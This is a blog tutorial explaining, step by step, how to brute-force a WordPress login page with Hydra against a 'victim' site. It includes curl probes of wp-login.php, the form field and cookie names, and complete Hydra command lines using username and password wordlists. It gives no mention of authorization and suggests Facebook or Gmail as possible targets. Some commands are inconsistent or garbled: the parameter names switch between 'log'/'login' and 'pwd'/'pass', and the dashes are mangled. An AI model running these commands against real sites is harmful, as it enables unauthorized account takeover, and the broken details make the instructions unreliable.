Cybersecurity

Hydra WordPress Brute Force Attack

Posted on by Fernando Tamez
23
May
In this tutorial, I will explain in detail how to perform a brute force attack on a WordPress site. We will use the popular and powerful tool Hydra, which comes pre-installed on Kali Linux, and if you don’t have Kali Linux, you can download it for your operating system. Hydra is a pentesting program that uses different methods such as brute force. It allows you to use dictionaries or word lists with many combinations of different usernames or passwords to try to “Log In” or “Access” the site you want to attack. Hydra will let you attempt to access any site that has a username and password form, for example, sites made with WordPress, Joomla, or for example, Facebook or Gmail. However, this tutorial is focused on accessing a WordPress site where we only have the username and do not have the password.
  1. First of all, it is necessary to identify the page where they ask for the username and password: https://www.victimpage.com/wp-login.php/
  2. Now it is necessary to identify the name of the username text field, the password text field, as well as the “Log In” button to access WordPress and the cookie WordPress uses to identify you as a logged-in user.
  3. To identify the names of these elements, you can do this by right-clicking and inspecting the source code. You can also identify them using the “curl” command in the Linux terminal.
  4. This tutorial will be done using Kali Linux, so I will open the terminal and write the following command: $ curl https://www.victimpage.com/wp-login.php/
  5. Before anything else, it is necessary to understand how Hydra works. Basically, Hydra works with the following command: $ hydra -L /dictionary/users.txt -P /dictionary/passwords.txt victimsite.com -V https-form-post ‘wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’
    • -L: means it will use the file with the list of users. If you use lowercase “l” instead, you can specify a single username (in case you know the victim’s username).
    • -P: means it will use the file with the list of passwords.
    • -V: means it will be in verbose mode, but since it is uppercase “-V”, it will show every attempt and only highlight the correct one in green. If you don’t want to see all attempts, use lowercase “-v” instead.
    • https-form-post: is one of many supported services that Hydra lets you attack.
    • ‘wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’: shows how WordPress sends the info using the POST method to the wp-login.php page and tries to access the wp-admin.php admin page.
  6. Once I press “enter,” the source code of https://www.victimpage.com will appear, so I will proceed to search for the name of each element or form field (username, password, login button, and cookie). If we were not trying to crack a WordPress site, we wouldn’t use the cookie because Hydra just detects wrong logins by the error message and moves on to the next username-password combination. However, WordPress works differently; it uses a cookie to identify that you are logged in, so it is necessary to find the cookie name as well.
    • WordPress is open source, so on every WordPress site, these are the names of each form field:
      • Username: “log”
      • Password: “pwd”
      • Button: “wp-submit”
      • Cookie: “testcookie”
  7. Having identified the name of each form field, I will run another “curl,” but this time I will send data using the “POST” method since WordPress sends data this way. This “curl” command that sends data should be done as follows: $ curl -v –data ‘login=REALUSER&pwd=REALPASS&wp-submit=Log In&testcookie=1’ https://www.victimpage.com/wp-login.php/
  8. When running the above command, if we observe the code, we will see an ERROR message saying cookies are blocked and above it, we will see the following option:
    • <Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure
  9. So, we will run the command again but now adding the cookie: $ curl -v –data ‘login=REALUSER&pwd=REALPASS&wp-submit=Log In&testcookie=1’ –cookie ‘wordpress_test_cookie=WP+Cookie+check’ https://www.victimpage.com/wp-login.php/
  10. Now we will see a message that the “Log In” was successful, and at the end of the message, we will see that WordPress uses the following text to identify a successful login: < Location: https://www.victimpage.com/wp-admin/
  11. Now it is necessary to create a “.txt” document where we put all the passwords we think might be valid, each separated by pressing the enter key so it forms a list.
  12. Now, since we have the “passwords.txt” file, we need to use the following Hydra command to perform the brute force attack: $ hydra -P /path/to/password/dictionary.txt -l username yoursite.com -V https-form-post ‘/wp-login.php:log=^USER^&pass=^PASS^&wp-submit=Log In&testcookie=1:S=Location’
Fernando Tamez

Lo que busco profesionalmente para todos, es lo que dice la frase: "Cloud done the right way, the best practices way." Trabajo para que TODOS utilicemos la nube de una manera segura y eficiente, para el beneficio de la humanidad. Somos una empresa de consultoría y capacitación tecnológica, enfocada en la comunicación digital, automatización y seguridad de la información.

Leave a Reply

Your email address will not be published. Required fields are marked *